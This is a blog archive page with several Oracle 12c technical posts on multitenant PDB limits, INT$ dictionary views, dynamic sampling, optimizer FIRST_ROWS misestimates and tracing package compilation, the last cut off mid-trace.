Quantcast
Channel: Archives des Oracle 12c - dbi Blog
Viewing all 190 articles
Browse latest View live

Max PDBs in Standard Edition

$
0
0

Here is a small warning. In Standard Edition, you may expect that the features that are not available for your edition are blocked, but in 12.2 you can create more than one PDB in Standard Edition, and you should set MAX_PDBS to prevent that.

12cR1

In 12.2 Standard Edition, when you try to create more than one PDB (i.e with CON>ID > 3) you get an error:

ORA-65010: maximum number of pluggable databases created

12cR2

But it seems that this has been lost in 12.2:


oracle@SE122 ~$ sqlplus / as sysdba
 
SQL*Plus: Release 12.2.0.1.0 Production on Thu Oct 10 11:41:56 2017
 
Copyright (c) 1982, 2016, Oracle. All rights reserved.
 
 
Connected to:
Oracle Database 12c Standard Edition Release 12.2.0.1.0 - 64bit Production
 
SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
---------- ------------------------------ ---------- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
 
SQL> create pluggable database PDB2 admin user admin identified by me;
 
Pluggable database created.
 
SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
---------- ------------------------------ ---------- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 MOUNTED
SQL> alter pluggable database PDB2 open;
 
Pluggable database altered.

So, if you are in Standard Edition, don’t forget to set MAX_PDBS to 1:

SQL> alter pluggable database PDB2 close immediate;
 
Pluggable database altered.
 
SQL> drop pluggable database PDB2 including datafiles;
 
Pluggable database dropped.
 
SQL> alter system set max_pdbs=1;
 
System altered.
 
SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
---------- ------------------------------ ---------- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
 
12:18:28 SQL> create pluggable database PDB2 admin user pdbadmin identified by oracle;
create pluggable database PDB2 admin user pdbadmin identified by oracle
*
ERROR at line 1:
ORA-65010: maximum number of pluggable databases created

 

Cet article Max PDBs in Standard Edition est apparu en premier sur Blog dbi services.


Multitenant internals: INT$ and INT$INT$ views

$
0
0

This month, I’ll talk – with lot of demos – about multitenant internals at DOAG conference. CaptureMultitenantInternals
The multitenant dictionary architecture starts with a simple idea: system metadata and data are in CDB$ROOT and user metadata and data are in PDB. And it could have been that simple. When a session connected to a PDB needs to read some system information, the session context is switched to the CDB$ROOT container and reads from CDB$ROOT SYS tablespace and objects, and then switches back to the PDB container. This is implemented by metadata and data links: the PDB lists the objects for which the session has to switch to CDB$ROOT to get metadata or data.

CaptureMultitenantInternals1But, for compatibility reason, and ease of administration, the dictionary views must display information from both containers, transparently, and then things become a little more complex with common views and extended data views.

At Oracle Open World, the multitenant architects, in the #PDBExpert session, answered questions about the multitenant architecture posted on Twitter. My first question (because I was investigating a bug at that time) was about some views, such as INT$INT$DBA_CONSTRAINTS, introduced to implement the complexity of showing the same information in dictionary views as the ones we had on non-CDB. Of course, the architects didn’t want to go too far on this and had a very accurate answer: INT$ is for internal, and here you have two ‘INT$’ so you shouldn’t look at that.

But I like to understand how things work and here is the explanation of these INT$INT$ views. And I’m not even sure that INT is for ‘internal’ but maybe ‘intermediate’. But for sure, the $ at the end is used by Oracle internal dictionary objects.

INT$ Extended Data views

We are used to seeing all objects, system ones and user ones, listed by the dictionary views. For example, DBA_PROCEDURES shows all procedures, system and user ones, and then have to read from both containers (current PDB and CDB$ROOT) through extended data links. ALL_PROCEDURES shows all procedures accessible by the user, and they also have to switch to CDB$ROOT if the user has been granted to read system objects. USER_PROCEDURES shows only the objects owned by the current user, and then can read from the current container only.

For the ease of the definition, in 12c all the joins on the underlying tables(such as procedureinfo$, user$, obj$) is done by an intermediate view such as INT$DBA_PROCEDURES which is defined as EXTENDED DATA link to read from CDB$ROOT in addition to the local table. Then DBA_PROCEDURES, ALL_PROCEDURES and USER_PROCEDURES are defined on top of it with the required where clause to filter out owner and privilege accessibility.

INT$INT$ Extended Data views

In this post, I’ll detail the special case of DBA_CONSTRAINTS because things are more complex to get the multitenant architecture behaving the same as the non-CDB.

There are several types of constraints which are identified with the CONSTRAINT_TYPE column of DBA_CONSTRAINTS, or the TYPE# of the underlying table CDEF#

Here, I query the underlying table with the CONTAINER() function to see what is stored in each container:

SQL> select decode(type#,1,'C',2,'P',3,'U',4,'R',5,'V',6,'O',7,'C',8,'H',9,'F',10,'F',11,'F',13,'F','?') constraint_type,
2 type#,con_id,count(*) from containers(cdef$)
3 group by type#,con_id order by type#,con_id;
 
CONSTRAINT_TYPE TYPE# CON_ID COUNT(*)
--------------- ----- ------ --------
C 1 1 74
C 1 3 74
P 2 1 843
P 2 3 844
U 3 1 238
U 3 3 238
R 4 1 324
R 4 3 324
V 5 1 11
O 6 1 172
O 6 3 26
C 7 1 5337
C 7 3 5337
F 11 1 11
F 11 3 11
? 12 1 3
? 12 3 3

I have very few user objects in this database. CON_ID=1 is CDB$ROOT and CON_ID=3 is my PDB. What we can see here is that we have nearly the same number of rows in both containers for the following constraint types: C (check constraint on a table), P (primary key), U (unique key), R (referential integrity), and other types related to tables. And some types have most of their rows in CDB$ROOT only: V (check option on views), R (read only on views)

That’s an implementation specificity of the multitenant architecture which makes things more complex for the dictionary views. For some objects (such as procedures and views) the metadata is stored in only one container: system objects have all their information in CDB$ROOT and the PDB has only a link which is a dummy row in OBJ$ which mentions the sharing (such as metadata link), owner and name (to match to the object in CDB$ROOT), and a signature (to verify that the DDL creating the object is the same). But other objects (such as tables) have their information duplicated in all containers for system objects (CDB$ROOT, PDB$SEED and all user PDBs). This is the reason why we see rows in both containers for constraint definition when they are related to a table.

Example on view constraint

I’ll take a constraint on system view as an example: constraint SYS_C003357 on table SYS.DBA_XS_SESSIONS


SQL> select owner,object_name,object_type,sharing from dba_objects where owner='SYS' and object_name='DBA_XS_SESSIONS';
 
OWNER OBJECT_NAME OBJECT_TYPE SHARING
----- ----------- ----------- -------
SYS DBA_XS_SESSIONS VIEW METADATA LINK
 
SQL> select owner,table_name,constraint_type,constraint_name from containers(dba_constraints) where owner='SYS' and table_name='DBA_XS_SESSIONS' and rownum=1;
 
OWNER TABLE_NAME CONSTRAINT_TYPE CONSTRAINT_NAME
----- ---------- --------------- ---------------
SYS DBA_XS_SESSIONS O SYS_C003357

I’m looking at the dependencies for the DBA_CONSTRAINTS view:

SQL> select owner,name,referenced_owner,referenced_name from dba_dependencies where owner='SYS' and name='DBA_CONSTRAINTS' and type='VIEW';
 
OWNER NAME REFERENCED_OWNER REFERENCED_NAME
----- ---- ---------------- ---------------
SYS DBA_CONSTRAINTS SYS GETLONG
SYS DBA_CONSTRAINTS SYS INT$DBA_CONSTRAINTS

So the DBA_CONSTRAINT is a view on INT$DBA_CONSTRAINTS as we have seen above. However, this view is not directly reading the tables but another view:

SQL> select owner,name,referenced_owner,referenced_name from dba_dependencies where owner='SYS' and name='INT$DBA_CONSTRAINTS' and type='VIEW';
 
OWNER NAME REFERENCED_OWNER REFERENCED_NAME
----- ---- ---------------- ---------------
SYS INT$DBA_CONSTRAINTS SYS GETLONG
SYS INT$DBA_CONSTRAINTS SYS INT$INT$DBA_CONSTRAINTS

Here is our additional INT$INT$ view which is reading the tables:

SQL> select owner,name,referenced_owner,referenced_name from dba_dependencies where owner='SYS' and name='INT$INT$DBA_CONSTRAINTS' and type='VIEW';
 
OWNER NAME REFERENCED_OWNER REFERENCED_NAME
----- ---- ---------------- ---------------
SYS INT$INT$DBA_CONSTRAINTS SYS USER$
SYS INT$INT$DBA_CONSTRAINTS SYS CDEF$
SYS INT$INT$DBA_CONSTRAINTS SYS OBJ$
SYS INT$INT$DBA_CONSTRAINTS SYS CON$
SYS INT$INT$DBA_CONSTRAINTS SYS _CURRENT_EDITION_OBJ
SYS INT$INT$DBA_CONSTRAINTS SYS _BASE_USER
SYS INT$INT$DBA_CONSTRAINTS SYS GETLONG

In summary, the EXTENDED DATA view which reads the tables on each container (CDB$ROOT and PDB) is here the INT$INT$DBA_CONSTRAINTS and the INT$DBA_CONSTRAINTS is another intermediate one before the DBA_CONSTRAINTS view.


SQL> select owner,object_name,object_type,sharing from dba_objects where object_name in ('DBA_CONSTRAINTS','INT$DBA_CONSTRAINTS','INT$INT$DBA_CONSTRAINTS') order by object_id desc;
 
OWNER OBJECT_NAME OBJECT_TYPE SHARING
----- ----------- ----------- -------
PUBLIC DBA_CONSTRAINTS SYNONYM METADATA LINK
SYS DBA_CONSTRAINTS VIEW METADATA LINK
SYS INT$DBA_CONSTRAINTS VIEW METADATA LINK
SYS INT$INT$DBA_CONSTRAINTS VIEW EXTENDED DATA LINK

In this example, we don’t understand the reason for the additional intermediate view because the return all the same number of rows in each container:


SQL> select con_id,constraint_type,constraint_name from containers(INT$INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 O SYS_C003357
3 O SYS_C003357
 
SQL> select con_id,constraint_type,constraint_name from containers(INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 O SYS_C003357
3 O SYS_C003357
 
SQL> select con_id,constraint_type,constraint_name from containers(DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 O SYS_C003357
3 O SYS_C003357

The difference is only a few additional columns from the object definition (OWNERID,OBJECT_ID,OBJECT_TYPE#,SHARING) in the INT$ and INT$INT$ which are not selected in the final view:

SQL> select * from containers(INT$INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
OWNER OWNERID CONSTRAINT_NAME CONSTRAINT_TYPE TABLE_NAME OBJECT_ID OBJECT_TYPE# SEARCH_CONDITION_VC R_OWNER R_CONSTRAINT_NAME DELETE_RULE STATUS DEFERRABLE DEFERRED VALIDATED GENERATED BAD RELY LAST_CHANGE INDEX_OWNER INDEX_NAME INVALID VIEW_RELATED SHARING ORIGIN_CON_ID CON_ID
----- ------- --------------- --------------- ---------- --------- ------------ ------------------- ------- ----------------- ----------- ------ ---------- -------- --------- --------- --- ---- ----------- ----------- ---------- ------- ------------ ------- ------------- ------
SYS 0 SYS_C003357 O DBA_XS_SESSIONS 10316 4 ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1 1
SYS 0 SYS_C003357 O DBA_XS_SESSIONS 10316 4 ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1 3
 
SQL> select * from containers(INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
OWNER OWNERID CONSTRAINT_NAME CONSTRAINT_TYPE TABLE_NAME OBJECT_ID OBJECT_TYPE# SEARCH_CONDITION_VC R_OWNER R_CONSTRAINT_NAME DELETE_RULE STATUS DEFERRABLE DEFERRED VALIDATED GENERATED BAD RELY LAST_CHANGE INDEX_OWNER INDEX_NAME INVALID VIEW_RELATED SHARING ORIGIN_CON_ID CON_ID
----- ------- --------------- --------------- ---------- --------- ------------ ------------------- ------- ----------------- ----------- ------ ---------- -------- --------- --------- --- ---- ----------- ----------- ---------- ------- ------------ ------- ------------- ------
SYS 0 SYS_C003357 O DBA_XS_SESSIONS 10316 4 ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1 1
SYS 0 SYS_C003357 O DBA_XS_SESSIONS 10316 4 ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1 3
 
SQL> select * from containers(DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
OWNER CONSTRAINT_NAME CONSTRAINT_TYPE TABLE_NAME SEARCH_CONDITION_VC R_OWNER R_CONSTRAINT_NAME DELETE_RULE STATUS DEFERRABLE DEFERRED VALIDATED GENERATED BAD RELY LAST_CHANGE INDEX_OWNER INDEX_NAME INVALID VIEW_RELATED ORIGIN_CON_ID CON_ID
----- --------------- --------------- ---------- ------------------- ------- ----------------- ----------- ------ ---------- -------- --------- --------- --- ---- ----------- ----------- ---------- ------- ------------ ------------- ------
SYS SYS_C003357 O DBA_XS_SESSIONS ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1
SYS SYS_C003357 O DBA_XS_SESSIONS ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17

If we look at the INT$DBA_CONSTRAINTS definition we see some filters on those object definition:

SQL> ddl INT$DBA_CONSTRAINTS
 
CREATE OR REPLACE FORCE NONEDITIONABLE VIEW "SYS"."INT$DBA_CONSTRAINTS" ("OWNER", "OWNERID", "CONSTRAINT_NAME", "CONSTRAINT_TYPE", "TABLE_NAME", "OBJECT_ID", "OBJECT_TYPE#", "SEARCH_CONDITION", "SEARCH_CONDITION_VC", "R_OWNER", "R_CONSTRAINT_NAME", "DELETE_RULE", "STATUS", "DEFERRABLE", "DEFERRED", "VALIDATED", "GENERATED", "BAD", "RELY", "LAST_CHANGE", "INDEX_OWNER", "INDEX_NAME", "INVALID", "VIEW_RELATED", "SHARING", "ORIGIN_CON_ID") AS
select OWNER, OWNERID, CONSTRAINT_NAME, CONSTRAINT_TYPE,
TABLE_NAME, OBJECT_ID, OBJECT_TYPE#, SEARCH_CONDITION,
SEARCH_CONDITION_VC, R_OWNER, R_CONSTRAINT_NAME, DELETE_RULE, STATUS,
DEFERRABLE, DEFERRED, VALIDATED, GENERATED,
BAD, RELY, LAST_CHANGE, INDEX_OWNER, INDEX_NAME,
INVALID, VIEW_RELATED, SHARING, ORIGIN_CON_ID
from INT$INT$DBA_CONSTRAINTS INT$INT$DBA_CONSTRAINTS
where INT$INT$DBA_CONSTRAINTS.OBJECT_TYPE# = 4 /* views */
OR (INT$INT$DBA_CONSTRAINTS.OBJECT_TYPE# = 2 /* tables */
AND (INT$INT$DBA_CONSTRAINTS.ORIGIN_CON_ID
= TO_NUMBER(SYS_CONTEXT('USERENV', 'CON_ID'))));

For views (OBJECT_TYPE#=4) there is no filter, which explains why we see the same number of rows in the previous example. But for tables (OBJECT_TYPE#=2) there’s an additional filter to keep the row from the current container only.

Example on table constraint

Then, I’ll take another example with a constraint definition for a table:

SQL> select owner,object_name,object_type,sharing from dba_objects where owner='SYS' and object_name='RXS$SESSIONS';
 
OWNER OBJECT_NAME OBJECT_TYPE SHARING
----- ----------- ----------- -------
SYS RXS$SESSIONS TABLE METADATA LINK
 
SQL> select owner,table_name,constraint_type,constraint_name from dba_constraints where owner='SYS' and table_name='RXS$SESSIONS' and rownum=1;
 
OWNER TABLE_NAME CONSTRAINT_TYPE CONSTRAINT_NAME
----- ---------- --------------- ---------------
SYS RXS$SESSIONS C SYS_C003339

From the INT$INT$ view, we have a duplicate when we query on a PDB because for tables the PDB not only holds a dummy row in OBJ$ but full information about the table is duplicated in other tables such as TAB$ and CDEF$:

SQL> select con_id,constraint_type,constraint_name from containers(INT$INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003339'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 C SYS_C003339
3 C SYS_C003339
3 C SYS_C003339

This is the reason for the additional intermediate view: filtering out those duplicate by removing the rows from CDB$ROOT when queried from a PDB.

SQL> select con_id,constraint_type,constraint_name from containers(INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003339'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 C SYS_C003339
3 C SYS_C003339

Thanks to that, the duplicates are not visible to the end-user views DBA_CONSTRAINTS and PDB_CONSTRAINTS.

You may wonder why only DBA_CONSTRAINTS needs this views and not DBA_TABLES, DBA_INDEXES or DBA_TAB_COLUMNS? That’s because all information about system tables and indexes are replicated in all PDBs and then there is no need for EXTENDED DATA and context switches. DBA_CONSTRAINT has the particularity of showing information about tables and views, which implement the metadata links in a different way.

 

Cet article Multitenant internals: INT$ and INT$INT$ views est apparu en premier sur Blog dbi services.

Dynamic Sampling vs. Extended Statistics

$
0
0

On datawarehouse databases, I frequently recommend increasing the level of dynamic sampling because:

  • Queries have complex predicates with AND, OR, IN(), ranges and correlated values for which the optimizer cannot estimate the cardinality properly
  • Queries are long anyway (compared to OLTP) and can afford more parse time to get an optimized execution plan

However, there’s a drawback with this approach because sometimes the dynamic sampling estimation may give bad estimations, and supersedes the static statistics which were better. Here is an example in 12.2.0.1

I run with the following parameters:

SQL> show parameter adaptive;
NAME TYPE VALUE
--------------------------------- ------- -----
optimizer_adaptive_plans boolean TRUE
optimizer_adaptive_reporting_only boolean FALSE
optimizer_adaptive_statistics boolean FALSE
optimizer_dynamic_sampling integer 4

The Dynamic Sampling level comes from previous version (11g) and the Adaptive Statistics have been disabled because of all the problems seen in 12cR1 with Adaptive Dynamic Sampling bugs.

I have a query with very bad response time for some values, going to nested loops for 50000 rows. The reason is an under-estimate in the following part of the query:

SQL> explain plan for
2 SELECT count(*) FROM "APP_OWNR"."TBL_APPLICATION1_ID" "TBL_APPLICATION1_ID" WHERE upper("TBL_APPLICATION1_ID"."OPRID") =upper ('qwertz');
Explained.
SQL> select * from table(dbms_xplan.display);
PLAN_TABLE_OUTPUT
Plan hash value: 2187255533
&nbspM
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 7 | 964 (1)| 00:00:01 |
| 1 | SORT AGGREGATE | | 1 | 7 | | |
|* 2 | TABLE ACCESS FULL| TBL_APPLICATION1_ID | 82 | 574 | 964 (1)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
2 - filter(UPPER("OPRID")='QWERTZ')
 
Note
-----
- dynamic statistics used: dynamic sampling (level=4)

The estimation is 82 rows but there are actually 50000 rows. We can see dynamic sampling. The misestimate is probably caused by a sample too small.

Ok, a query with an UPPER() function on the column is not a good idea. Let’s try to gather statistics for the expression:

SQL> exec dbms_stats.gather_table_stats('APP_OWNR','TBL_APPLICATION1_ID',method_opt=>'for all columns size auto for columns (upper(OPRID)) size auto');
PL/SQL procedure successfully completed.
 
SQL> explain plan for
2 SELECT count(*) FROM "APP_OWNR"."TBL_APPLICATION1_ID" "TBL_APPLICATION1_ID" WHERE upper("TBL_APPLICATION1_ID"."OPRID") =upper ('qwertz');
Explained.
SQL> select * from table(dbms_xplan.display);
PLAN_TABLE_OUTPUT
Plan hash value: 2187255533
 
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 7 | 964 (1)| 00:00:01 |
| 1 | SORT AGGREGATE | | 1 | 7 | | |
|* 2 | TABLE ACCESS FULL| TBL_APPLICATION1_ID | 82 | 574 | 964 (1)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
2 - filter(UPPER("OPRID")='QWERTZ')
PLAN_TABLE_OUTPUT
 
Note
-----
- dynamic statistics used: dynamic sampling (level=4)

We have the same misestimate. But the problem is not our statistics on expression. This query is still doing dynamic sampling.

Here’s the proof that we have good static statistics:

SQL> alter session set optimizer_dynamic_sampling=2;
Session altered.
 
SQL> explain plan for
2 SELECT count(*) FROM "APP_OWNR"."TBL_APPLICATION1_ID" "TBL_APPLICATION1_ID" WHERE upper("TBL_APPLICATION1_ID"."OPRID") =upper ('qwertz');
Explained.
SQL> select * from table(dbms_xplan.display);
PLAN_TABLE_OUTPUT
Plan hash value: 2187255533
 
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 7 | 964 (1)| 00:00:01 |
| 1 | SORT AGGREGATE | | 1 | 7 | | |
|* 2 | TABLE ACCESS FULL| TBL_APPLICATION1_ID | 48594 | 332K| 964 (1)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
2 - filter(UPPER("OPRID")='QWERTZ')

Dynamic Sampling did not occur at level 2. Now the estimation is ok thanks to the extended statistics. I have a top-frequency histogram where the cardinality of popular value is exact.

The problem is that dynamic sampling is supposed to add more information to the optimizer, but in this case, it replaces the static statistics. In level 4, dynamic sampling is done as soon as there is a complex predicate in the where clause. And the use of the UPPER() function is considered as a complex predicate. However, in this case, because I have extended statistics, it should be considered as a simple column=value predicate.

Here I’ve set dynamic sampling manually, but this is also what happens when SQL Plan Directives trigger the use of Dynamic Sampling and the good histogram is ignored. This reminds me a Ludovico Caldara blog post about SPD.

Here, maybe, the solution would be Adaptive Dynamic Sampling which may increase the level of sampling when needed:

SQL> alter session set optimizer_dynamic_sampling=11;
Session altered.
 
SQL> explain plan for
2 SELECT count(*) FROM "APP_OWNR"."TBL_APPLICATION1_ID" "TBL_APPLICATION1_ID" WHERE upper("TBL_APPLICATION1_ID"."OPRID") =upper ('qwertz');
Explained.
SQL> select * from table(dbms_xplan.display);
PLAN_TABLE_OUTPUT
Plan hash value: 2187255533
 
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 7 | 964 (1)| 00:00:01 |
| 1 | SORT AGGREGATE | | 1 | 7 | | |
|* 2 | TABLE ACCESS FULL| TBL_APPLICATION1_ID | 37831 | 258K| 964 (1)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
2 - filter(UPPER("OPRID")='QWERTZ')
 
Note
-----
- dynamic statistics used: dynamic sampling (level=AUTO)

In this case, Adaptive Dynamic Sampling is a good approximation. But it would be better to have a level of dynamic sampling that does not consider a predicate as a complex one when the extended statistics exactly match the predicate. Before there is enough artificial intelligence to cope with this, the best recommendation is to focus on design. In this case, ensuring that we have only uppercase values is the best way to keep queries and estimations simple.

 

Cet article Dynamic Sampling vs. Extended Statistics est apparu en premier sur Blog dbi services.

CBO, FIRST_ROWS and VIEW misestimate

$
0
0

There are several bugs with the optimizer in FIRST_ROWS mode. Here is one I encountered during a 10.2.0.4 to 12.2.0.1 migration when a view had an ‘order by’ in its definition.

Here is the test case that reproduces the problem.

A big table:

SQL> create table DEMO1 (n constraint DEMO1_N primary key,x,y) as select 1/rownum,'x','y' from xmltable('1 to 1000000');
Table DEMO1 created.

with a view on it, and that view has an order by:

SQL> create view DEMOV as select * from DEMO1 order by n desc;
View DEMOV created.

and another table to join to:

SQL> create table DEMO2 (x constraint DEMO2_X primary key) as select dummy from dual;
Table DEMO2 created.

My query reads the view in a subquery, adds a call to a PL/SQL function, and joins the result with the other table:


SQL> explain plan for
select /*+ first_rows(10) */ *
from
( select v.*,dbms_random.value from DEMOV v)
where x in (select x from DEMO2)
order by n desc;
 
Explained.

You can see that I run it with FIRST_ROWS(10) because I actually want to fetch the top-10 rows when ordered by N. As N is a number and I have an index on it and there are no nulls (it is the primary key) I expect to read the first 10 entries from the index, call the function for each of them, then nested loop to the other tables.

In the situation I encountered it, this is what was done in 10g but when migrated to 12c the query was very long because it called the PL/SQL function for million of rows. Here is the plan in my example:


SQL> select * from dbms_xplan.display(format=>'+projection');
 
PLAN_TABLE_OUTPUT
-----------------
Plan hash value: 2046425878
 
--------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes |TempSpc| Cost (%CPU)| Time |
--------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 21 | | 7 (0)| 00:00:01 |
| 1 | NESTED LOOPS SEMI | | 1 | 21 | | 7 (0)| 00:00:01 |
| 2 | VIEW | DEMOV | 902 | 17138 | | 7 (0)| 00:00:01 |
| 3 | SORT ORDER BY | | 968K| 17M| 29M| 6863 (1)| 00:00:01 |
| 4 | TABLE ACCESS FULL | DEMO1 | 968K| 17M| | 1170 (1)| 00:00:01 |
| 5 | VIEW PUSHED PREDICATE | VW_NSO_1 | 1 | 2 | | 0 (0)| 00:00:01 |
|* 6 | INDEX UNIQUE SCAN | DEMO2_X | 1 | 2 | | 0 (0)| 00:00:01 |
--------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
6 - access("X"="V"."X")
 
Column Projection Information (identified by operation id):
-----------------------------------------------------------
 
1 - (#keys=0) "V"."N"[NUMBER,22], "V"."X"[CHARACTER,1], "V"."Y"[CHARACTER,1] 2 - "V"."N"[NUMBER,22], "V"."X"[CHARACTER,1], "V"."Y"[CHARACTER,1] 3 - (#keys=1) INTERNAL_FUNCTION("N")[22], "X"[CHARACTER,1], "Y"[CHARACTER,1] 4 - "N"[NUMBER,22], "X"[CHARACTER,1], "Y"[CHARACTER,1]

A full table scan of the big table, with a call to the PL/SQL function for each row and the sort operation on all rows. Then the Top-10 rows are filtered and the nested loop operates on that. But you see the problem here. The cost of the ‘full table scan’ and the ‘order by’ has been evaluated correctly, but the cost after the VIEW operation is minimized.

My interpretation (but it is just a quick guess) is that the the rowset is marked as ‘sorted’ and then the optimizer considers that the cost to get first rows is minimal (as if it were coming from an index). However, this just ignores the initial cost of getting this rowset.

I can force with a hint the plan that I want – index full scan to avoid a sort and get the top-10 rows quickly:

SQL> explain plan for
select /*+ first_rows(10) INDEX_DESC(@"SEL$3" "DEMO1"@"SEL$3" ("DEMO1"."N")) */ *
from
( select v.*,dbms_random.value from DEMOV v)
where x in (select x from DEMO2)
order by n desc;
 
Explained.

This plan is estimated with an higher cost than the previous one and this is why it was not chosen:

SQL> select * from dbms_xplan.display(format=>'+projection');
PLAN_TABLE_OUTPUT
Plan hash value: 2921908728
 
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 21 | 9 (0)| 00:00:01 |
| 1 | NESTED LOOPS SEMI | | 1 | 21 | 9 (0)| 00:00:01 |
| 2 | VIEW | DEMOV | 902 | 17138 | 9 (0)| 00:00:01 |
| 3 | TABLE ACCESS BY INDEX ROWID| DEMO1 | 968K| 17M| 8779 (1)| 00:00:01 |
| 4 | INDEX FULL SCAN DESCENDING| DEMO1_N | 968K| | 4481 (1)| 00:00:01 |
| 5 | VIEW PUSHED PREDICATE | VW_NSO_1 | 1 | 2 | 0 (0)| 00:00:01 |
|* 6 | INDEX UNIQUE SCAN | DEMO2_X | 1 | 2 | 0 (0)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
6 - access("X"="V"."X")
 
Column Projection Information (identified by operation id):
-----------------------------------------------------------
 
1 - (#keys=0) "V"."N"[NUMBER,22], "V"."X"[CHARACTER,1], "V"."Y"[CHARACTER,1] 2 - "V"."N"[NUMBER,22], "V"."X"[CHARACTER,1], "V"."Y"[CHARACTER,1] 3 - "N"[NUMBER,22], "X"[CHARACTER,1], "Y"[CHARACTER,1] 4 - "DEMO1".ROWID[ROWID,10], "N"[NUMBER,22]

This cost estimation is fine. The cost of getting all rows by index access is higher than with a full table scan, but the optimizer knows that the actual cost is proportional to the number of rows fetched and then it adjusts the cost accordingly. This is fine here because the VIEW has only non-blocking operations. The problem in the first plan without the hint, was because the same arithmetic was done, without realizing that the SORT ORDER BY is a blocking operation and not a permanent sorted structure, and must be completed before being able to return the first row.

In this example, as in the real case I’ve encountered, the difference in cost is very small (7 versus 9 here) which means that the plan can be ok and switch to the bad one (full scan, call function for all rows, sort them) with a small change in statistics. Note that I mentioned that the plan was ok in 10g but that may simply be related to the PGA settings and different estimation for the cost of sorting.

 

Cet article CBO, FIRST_ROWS and VIEW misestimate est apparu en premier sur Blog dbi services.

12c Multitenant Internals: compiling system package from PDB

$
0
0

DPKi1vxX0AAADLmWhen I explain the multitenant internals, I show that all metadata about system procedures and packages are stored only in CDB$ROOT and are accessed from the PDBs through metadata links. I take an example with DBMS_SYSTEM that has nothing in SOURCE$ of the PDB. But I show that we can compile it from the PDB. This is my way to prove that the session can access the system objects, internally switching the session to the root container when it needs to read SOURCE$. At DOAG Conference I had a very interesting question about what happens exactly in CDB$ROOT: Is the session really executing all the DML on the internal tables storing the compiled code of the procedure?

My first answer was something like ‘why not’ because the session in a PDB can switch and do modifications into CDB$ROOT internally. For example, even a local PDB DBA can change some ‘spfile’ parameters which are actually stored in the CDB$ROOT. But then I realized that the question goes further: is the PDB session really compiling the DBMS_SYSTEM package in the CDB$ROOT? Actually, there are some DDL that are transformed to ‘no-operation’ when executed on the PDB.

To see which ones are concerned, the best is to trace:

SQL> alter session set events='10046 trace name context forever, level 4';
Session altered.
SQL> alter session set container=PDB1;
Session altered.
SQL> alter package dbms_system compile;
Package altered.
SQL> alter session set events='10046 trace name context off';
Session altered.

I’ll not show the whole trace here. For sure I can see that the session switches to CDB$ROOT to read the source code of the package:

*** 2017-11-22T08:36:01.963680+01:00 (CDB$ROOT(1))
=====================
PARSING IN CURSOR #140650193204552 len=54 dep=1 uid=0 oct=3 lid=0 tim=5178881528 hv=696375357 ad='7bafeab8' sqlid='9gq78x8ns3q1x'
select source from source$ where obj#=:1 order by line
END OF STMT
PARSE #140650193204552:c=0,e=290,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,plh=0,tim=5178881527
EXEC #140650295606992:c=1000,e=287,p=0,cr=0,cu=0,mis=0,r=0,dep=2,og=4,plh=813480514,tim=5178881999
